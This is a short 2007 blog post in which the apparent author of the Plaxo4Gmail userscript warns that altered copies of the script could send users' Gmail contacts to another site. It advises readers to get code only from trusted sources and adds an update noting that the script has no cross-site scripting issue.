Sunday, January 7, 2007

Security Issues and me... and you!

Is Plaxo4Gmail a security risk? My answer, yes and here is why.

When running this script, it shares your contacts with another site. If you got an unauthorized copy from anywhere EXCEPT this website, the script could be altered to send your contacts to a different site.

So don't install this script if you cant understand the code. This was first brought to my attention on the Google Blogscoped site from this entry. Practice safe hex. Always trust who you are getting your code from. If you don't trust me, (and why should you?) don't use the script.

That being said, I'd like to thank Plaxo and Mark Jen for the recent invite to beta test some of their unreleased sync products. I'm honored to be able to lend my assistance!

Update: 02/25/07
This illustrates what I mean by my original comments. Plaxo4Gmail does not use this hack as my script does not have a cross-site scripting (XSS) issue. But I though it was good article and worth the read.